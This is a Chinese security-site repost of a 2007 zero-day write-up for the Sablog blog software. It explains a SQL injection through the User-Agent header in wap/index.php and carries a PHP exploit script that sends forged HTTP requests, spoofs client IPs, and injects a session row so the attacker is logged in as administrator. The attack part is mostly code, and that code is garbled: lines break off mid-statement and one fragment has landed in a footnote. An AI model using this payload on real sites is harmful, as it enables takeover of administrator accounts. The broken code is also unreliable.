首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 专题文章

sa-blog 0day


http://www.gipsky.com/
来源:loveshell引用至 jackal第一:利用是PHP5,是因为_SERVER的变量不受'引号的限制,即便是开启了转义



漏洞出在User-Agent



第二:insert into的多个数据插入



文中构造的地方就是



insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ('$hash', '".$user['userid']."', '".$user['groupid']."', '$iprand','',1),('9c5b71e5',1,1,'211.43.206.202','9989581653', '$timestamp');



MYSQL支持



insert into [admin] (name,pass) values ('qq','bb'),('aa','cc')



这样的数据插入.



ACCESS不可以.sablog是国内安全研究人员写的一款blog程序,但是代码中有一点瑕疵导致可能被获取治理员权限:)



问题出在wap/index.php里的652行左右



------------

$hash = getuserhash($user['userid'], $user['username'], $user['password'], $user['logincount'] 1);

$DB->query("delete FROM {$db_prefix}sessions where uid='".$user['userid']."' OR lastactivity 3600http://www.loveshell.net/blog test test\r\n";

echo" ---------------------------------------------------------------- \r\n";



if(!$username||!$password) die;



echo" root@localhost:Post our content\r\n";



$str = 'username='.$username.'&password='.$password.'&action=login&do=login&';



$msg = myrequest($str,$url);

echo $msg;



if(strpos($msg,'登陆成功')!==false) echo" root@localhost:All Done!!! \r\n";

else echo" root@localhost:Login error!!! \r\n";

echo" ---------------------------------------------------------------- \r\n";

echo" Enjoy yourself.\r\n";

echo" ---------------------------------------------------------------- \r\n";



function myrequest($msg,$url,$type=2,$cookie=''){

//change type for post/get

global $sql;

$urls = initurl($url);

$iprand = rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);

$fp = @fsockopen($urls['host'], $urls['port'], $errno, $errstr, 3);

if($fp) {

if($type==1){

fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n");

fputs($fp, "Host: $urls[host]\r\n");

fputs($fp, "Accept: */*\r\n");

fputs($fp, "Referer: $urls[url]\r\n");

fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n");

fputs($fp, "CLIENT_IP: $iprand\r\n");

fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");

fputs($fp, "Pragma: no-cache\r\n");

fputs($fp, "Cache-Control: no-cache\r\n");

fputs($fp, "Connection: Keep-Alive\r\n");

fputs($fp, "Cookie: $cookie\r\n\r\n");

}else{

fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n");

fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");

fputs($fp, "Referer: $urls[url]\r\n");

fputs($fp, "Accept-Language: zh-cn\r\n");

fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");

// fputs($fp, "User-Agent: ',1),[1] {

$resp .= fread($fp,1024);

}

return $resp;

}



function initurl($url) {



$newurl = '';

$blanks = array('url'=>'');

$urls = $blanks;



if(strlen($url)[最后修改由 , 于 2007-09-17 12:41:15]
附注
  1. select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,'211.43.206.208','123\r\n");

    fputs($fp, "User-Agent: ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653\r\n");

    fputs($fp, "CLIENT_IP: $iprand\r\n");

    fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");

    fputs($fp, "Host: $urls[host]\r\n");

    fputs($fp, "Content-Length: ".strlen($msg)."\r\n");

    fputs($fp, "Connection: Keep-Alive\r\n");

    fputs($fp, "Cache-Control: no-cache\r\n");

    fputs($fp, "Cookie: $cookie\r\n\r\n");

    fputs($fp, $msg."\r\n");

    }

    }



    while($fp&&!feof($fp
<< 德国警方抓捕Tor服务器管理人 热烈祝贺慕容小雨新婚愉快! >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8